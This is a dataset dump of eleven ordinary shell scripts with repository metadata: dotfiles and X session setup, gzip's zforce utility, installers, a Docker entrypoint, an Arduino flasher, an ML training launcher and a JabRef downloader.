89439bce5dc4101a2906adac3977f649048fa794
|
Shell
|
voutilad/dotfiles-1
|
/.xsession
|
UTF-8
| 1,523
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh -x
# X session startup: sets up displays, input devices and helper daemons,
# then runs ratpoison as the window manager. Main branch targets OpenBSD
# laptops; the else-branch is a reduced fallback for other systems.
# Kill session helper daemons and drop the X authority file on exit.
cleanup() {
echo "cleaning up"
pkill -9 dzen2 i3status dbus-daemon redshift
rm -f ~/.Xauthority
}
trap cleanup INT TERM QUIT
export LANG=en_US.UTF-8
export MOZ_USE_XINPUT2=1
# Current X screen width, parsed out of xrandr's "Screen 0" summary line.
SCREEN_WIDTH=`xrandr 2>&1 | grep "Screen 0: minimum" | sed -e 's/.*, current //' -e 's/ x.*//'`
if [ "${SCREEN_WIDTH}" -gt 2000 ]; then
export HIDPI=1
echo "using HIDPI"
fi
# Load X resources, passing a HIDPI define when applicable.
if [ "$HIDPI" = "1" ]; then
xrdb -DHIDPI=1 < ~/.Xdefaults
else
xrdb < ~/.Xdefaults
fi
# "Vendor Product" string used to select per-machine tweaks below.
MACHINE="`sysctl -n hw.vendor` `sysctl -n hw.product`"
# NOTE(review): `==` inside `[` is non-POSIX; it works under OpenBSD's
# ksh-derived /bin/sh but not under strict sh — confirm before porting.
if [ `uname -s` == "OpenBSD" ]; then
eval `dbus-launch --sh-syntax`
ruby ~/code/dzen-jcs/dzen-jcs.rb &
xmodmap ~/.xmodmap
xset b off
xset r rate 350 35
xset m 3/1 4
# disable built-in saver, because xidle will handle it
xset s off
# disable dpms, because slock will handle it
xset dpms 0 0 0
xidle -timeout 500 -ne -program ~/bin/lock &
xsetroot -solid '#6c7c87' -cursor_name left_ptr
redshift -l 41.90:-87.66 -t 6500:3500 -m randr:preserve=1 &
xbanish &
# Per-machine colour profile plus backlight/touchpad configuration.
case $MACHINE in
"LENOVO 20HRCTO1WW")
xcalib ~/.icc/x1c5wqhd-LP140QH2_SPB1.icc
xdimmer -k -t 20 -n &
synclient \
PalmDetect=1 \
PalmMinWidth=8 \
ClickPad=1 \
;
;;
"HUAWEI HUAWEI MateBook X")
xcalib ~/.icc/matebookx.icc
xdimmer -n -a &
;;
*)
echo "running on unknown machine \"${MACHINE}\""
;;
esac
# Blocks until the window manager exits; cleanup below then runs.
/usr/local/bin/ratpoison
else
# Non-OpenBSD fallback (e.g. X11 on macOS): minimal setup, mac-specific rc.
xset +fp ~/.fontspcf fp rehash
xset b off
/usr/local/bin/xbanish &
xsetroot -cursor_name left_ptr
/usr/local/bin/ratpoison -f ~/.ratpoisonrc.mac
fi
cleanup
|
5f2dd1ce3f254c62ca33447cc6b5b9b7d826ccf6
|
Shell
|
AnwarAsif/vimrc
|
/install_basic.sh
|
UTF-8
| 221
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/sh
# Install the basic vim configuration: back up the current ~/.vimrc,
# then overwrite it with the contents of ~/.rcasif/basicrc.
set -e # exit in case of any error

# Also serves as a sanity check that the rc repo is present.
cd ~/.rcasif

# Keep a backup of the existing configuration before overwriting it.
cp ~/.vimrc ~/.vimrc_bk
cat basicrc > ~/.vimrc

echo "My basic RC file is loaded in to ~./.vimrc file"
echo "Previous vimrc is save to ~/.vimrc_bk file"
| true
|
17d1e02df9874f7d2cd7afa565ef7dd7853133da
|
Shell
|
jschauma/photoscripts
|
/combine-videos
|
UTF-8
| 285
| 3.171875
| 3
|
[] |
no_license
|
#! /bin/sh
# Concatenate the video+audio streams of every input file into
# combined.mov via ffmpeg's concat filter.
#
# Usage: combine-videos FILE...

n=0
filter=""
iflags=""

# "$@" (quoted) so each argument stays one word; note that filenames
# containing spaces would still break the eval'ed command line below.
for i in "$@"; do
	iflags="${iflags} -i ${i}"
	# One "[N:0] [N:1]" video/audio pad pair per input, space-separated.
	filter="${filter}${filter:+ }[${n}:0] [${n}:1]"
	n=$(( ${n} + 1 ))
done

# eval is needed so the single-quoted filter expression reaches ffmpeg
# as a single -filter_complex argument.
eval ffmpeg ${iflags} \
	-filter_complex \'${filter} concat=n=${n}:v=1:a=1 [v] [a]\' \
	-map '[v]' -map '[a]' combined.mov
| true
|
ee3fcac23a82f951aa10976d0e1cefde052a9fea
|
Shell
|
fuzzm/fuzzm-project
|
/benchmarks/LAVA-M/md5sum/binbackup/zforce
|
UTF-8
| 2,104
| 3.890625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# zforce: force a gz extension on all gzip files so that gzip will not
# compress them twice.
#
# This can be useful for files with names truncated after a file transfer.
# 12345678901234 is renamed to 12345678901.gz
# Copyright (C) 2002, 2007, 2010 Free Software Foundation
# Copyright (C) 1993 Jean-loup Gailly
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# --__bindir is an internal hook (used by gzip's build/test harness) to
# put a private gzip install first on PATH; not a public option.
bindir='/bin'
case $1 in
--__bindir) bindir=${2?}; shift; shift;;
esac
PATH=$bindir:$PATH; export PATH
version="zforce (gzip) 1.5
Copyright (C) 2010-2012 Free Software Foundation, Inc.
This is free software. You may redistribute copies of it under the terms of
the GNU General Public License <http://www.gnu.org/licenses/gpl.html>.
There is NO WARRANTY, to the extent permitted by law.
Written by Jean-loup Gailly."
usage="Usage: $0 [FILE]...
Force a .gz extension on all compressed FILEs so that gzip will
not compress them twice.
Report bugs to <bug-gzip@gnu.org>."
# At least one file operand is required.
if test $# = 0; then
echo >&2 "$0: invalid number of operands; try \`$0 --help' for help"
exit 1
fi
res=0
for i do
# Handle --help/--version, and skip files that already carry a
# compressed suffix (.z/.gz/-z/-gz/.taz/.tgz).
case "$i" in
--h*) exec echo "$usage";;
--v*) exec echo "$version";;
*[-.]z | *[-.]gz | *.t[ag]z) continue;;
esac
if test ! -f "$i" ; then
echo zforce: $i not a file
res=1
continue
fi
# `gzip -lv` prints a line starting with "defl" only for
# deflate-compressed input; only such files get renamed.
if gzip -lv < "$i" 2>/dev/null | grep '^defl' > /dev/null; then
new="$i.gz"
if mv "$i" "$new"; then
echo $i -- replaced with $new
else
res=$?
fi
fi
done
exit $res
| true
|
e03a39b6a9c3cd0d896f9ce7fa1243f0db88816a
|
Shell
|
trevora/dotfiles
|
/packages
|
UTF-8
| 486
| 3.1875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Run dotbot with the apt-get plugin against packages.conf.yaml,
# forwarding any extra CLI arguments to dotbot.
set -e

CONFIG="packages.conf.yaml"
DOTBOT_DIR="dotbot"
APTGET_DIR="dotbot_plugin_aptget"
DOTBOT_BIN="bin/dotbot"
APTGET_PLUGIN="aptget.py"

BASEDIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
cd "${BASEDIR}"

# Make sure both vendored submodules are present and up to date.
for submodule in "${DOTBOT_DIR}" "${APTGET_DIR}"; do
    git submodule update --init --recursive "${submodule}"
done

"${BASEDIR}/${DOTBOT_DIR}/${DOTBOT_BIN}" -d "${BASEDIR}" -c "${BASEDIR}/${CONFIG}" -p "${BASEDIR}/${APTGET_DIR}/${APTGET_PLUGIN}" "$@"
| true
|
243088c32bf9ec385c22f044b71146ba2184b777
|
Shell
|
guillon/docker-qemu-tutorial
|
/entrypoint.sh
|
UTF-8
| 470
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Container entrypoint for the QEMU tutorial image.
# With arguments (other than a leading "--"): exec them as the command.
# Without: seed the tutorial sources on first run and start a shell.
set -euo pipefail

if [[ $# -gt 0 && "$1" != "--" ]]; then
    exec "$@"
fi

cd /home/hacker

# Copy the tutorial tree out of the image on the first run only.
if [[ ! -d qemu-tutorial ]]; then
    cp -a /qemu-tutorial qemu-tutorial
fi

echo ""
echo " Welcome to the JCF11 QEMU Tutorial"
echo ""
echo " You're running bash into a Ubuntu 14.04 container as user 'hacker'."
echo ""
echo " You may check your install with:"
echo " > check-install.sh"
echo " which should dump a binary search call trace."
echo ""

exec bash
| true
|
5d65c796e7bd0d26a361be7379a29d85243996be
|
Shell
|
vejmelkam/fmda_scraper
|
/retrieve_observations.sh
|
UTF-8
| 328
| 3.75
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Download the last 24 hours of observations for every station listed in
# a station-list file, invoking scrape_station.py once per station.
#
# Usage: retrieve_observations.sh <station-list> <timestamp>
#   <station-list> - file of station codes; '#'-prefixed lines are ignored
#   <timestamp>    - formatted as YYYY-MM-DD_HH:mmm

if [ $# -ne 2 ]; then
    echo "usage: retrieve_observations.sh <station-list> <timestamp>"
    echo " <timestamp> must be formatted as YYYY-MM-DD_HH:mmm"
    exit 2
fi

# Drop comment lines; the unquoted expansion in the loop below
# deliberately word-splits the remaining tokens into station codes.
STATIONS=$(grep -v "^#" "$1")

for S in $STATIONS ;
do
    echo "Processing $S ..."
    python scrape_station.py -c "$S" -i 24 -t "$2" dl
done
| true
|
a8cca5935f237703d7f987bd91fd3ee64842f9a2
|
Shell
|
onebytegone/arduino-blink
|
/bin/flash.sh
|
UTF-8
| 560
| 3.796875
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Flash the project's compiled hex image onto an Arduino (atmega328p)
# over serial with avrdude.
# Usage: ./bin/flash.sh ${PORT}
set -e

TARGET_PORT=$1
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"

# A serial port argument is mandatory; list likely candidates when absent.
case "${TARGET_PORT}" in
    '')
        echo "ERROR: A port must be provided e.g. ./bin/flash.sh /dev/tty.usbmodem123"
        echo
        echo "Known ports:"
        ls -1 /dev/tty.*
        exit 1
        ;;
esac

# project-vars.sh defines PROJECT_NAME, which names the hex artifact.
source "${SCRIPT_DIR}/../project-vars.sh"
HEX_FILE="src/${PROJECT_NAME}.hex"

echo "Flashing ${HEX_FILE} to ${TARGET_PORT}..."
avrdude -F -V -c arduino -p atmega328p -P "${TARGET_PORT}" -b 115200 -U "flash:w:${HEX_FILE}"
| true
|
419fb275396a9a2b33072ff7de702b98bce66633
|
Shell
|
rit-git/tagging
|
/appendix/albert/albert.sh
|
UTF-8
| 808
| 2.625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Fine-tune ALBERT (albert-base-v1) on each listed dataset via
# ../../model/transformer.py, appending results to ./log/albert.log.
CUDA=3

# -p keeps reruns from failing when ./log already exists.
mkdir -p log

# Random seed, used for training and for the model output directory name.
# NOTE(review): the original interpolated the undefined ${rand_seed} into
# MODEL_DIR (producing ".../seed_" with an empty suffix); assuming ${SEED}
# was intended — confirm against the sibling model scripts.
SEED=1000

for dataset in "SUGG"
do
    DATA_DIR="/home/ubuntu/users/jinfeng/tagging/data/${dataset}"
    MODEL_DIR="./model/${dataset}/seed_${SEED}"
    LOG_FILE_PATH="./log/albert.log"

    # Blank separator line between runs in the shared log.
    echo "" >> "${LOG_FILE_PATH}"

    CUDA_VISIBLE_DEVICES=${CUDA} python ../../model/transformer.py \
        --model_type albert \
        --model_name_or_path albert-base-v1 \
        --task_name SST-2 \
        --do_train \
        --do_lower_case \
        --data_dir "$DATA_DIR" \
        --max_seq_length 128 \
        --per_gpu_eval_batch_size=32 \
        --per_gpu_train_batch_size=32 \
        --learning_rate 2e-5 \
        --num_train_epochs 3.0 \
        --output_dir "$MODEL_DIR" \
        --log_file_path "$LOG_FILE_PATH" \
        --save_snapshots 1 \
        --seed ${SEED}
done
| true
|
2eb28008b69e4fd0115bd2018c9a50c61987fb98
|
Shell
|
skulumani/system_setup
|
/build_scripts/setup_jabref.sh
|
UTF-8
| 1,111
| 3.703125
| 4
|
[] |
no_license
|
# Download and setup JabRef into ~/
JABREF_VERSION="5.1"
JABREF_FNAME="JabRef-${JABREF_VERSION}-portable_linux.tar.gz"
JABREF_LINK="https://builds.jabref.org/master/${JABREF_FNAME}"
JABREF_DIR="$HOME/JabRef"

WORK_DIR=$(mktemp -d)

# make sure tmp dir was actually created
if [[ ! -d "$WORK_DIR" ]]; then
    echo "Could not create temp directory"
    exit 1
fi

# delete temp dir
cleanup () {
    rm -rf "$WORK_DIR"
    echo "Deleted temp working directory: $WORK_DIR"
}
# Fix: this trap was commented out, leaking one temp directory (plus a
# downloaded tarball) per run; register cleanup for every exit path.
trap cleanup EXIT

# test to see if Jabref directory exists
if [[ ! -d "${JABREF_DIR}" ]]; then
    echo "Creating ${JABREF_DIR}"
    mkdir -p "${JABREF_DIR}"
else
    echo "${JABREF_DIR} already exists"
fi

echo "Downloading ${JABREF_FNAME}"
# Abort on download/extract failure instead of moving nonexistent files.
wget "${JABREF_LINK}" -O "${WORK_DIR}/${JABREF_FNAME}" || exit 1

# untar it
cd "$WORK_DIR" || exit 1
tar -xvzf "${JABREF_FNAME}" || exit 1

mv ./JabRef/bin "${JABREF_DIR}"
mv ./JabRef/lib "${JABREF_DIR}"

# echo "Install Oracle JAVA"
# sudo add-apt-repository ppa:webupd8team/java
# sudo apt-get update
# sudo apt-get install oracle-java8-installer

# setup links for Jabref icon/menu item
# should be setup by the dotfiles installer
| true
|
e144758c69f9b13db577037b769a9ec37f4e68fb
|
Shell
|
SimpleValue/sv.gcloud.docker.clj-app
|
/run.sh
|
UTF-8
| 222
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# Launch the Clojure app: require an edn CONFIG, optionally fetch the
# uberjar from GCS when UBERJAR is set, then run it.

if [ -z "$CONFIG" ]; then
    echo "Env variable CONFIG with edn config for app is missing"
    exit 1
fi

# Download the jar only when a GCS source is given; -n skips an
# already-present local copy.
if [ -n "$UBERJAR" ]; then
    gsutil cp -n "$UBERJAR" uberjar.jar
fi

java -jar uberjar.jar "$CONFIG"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.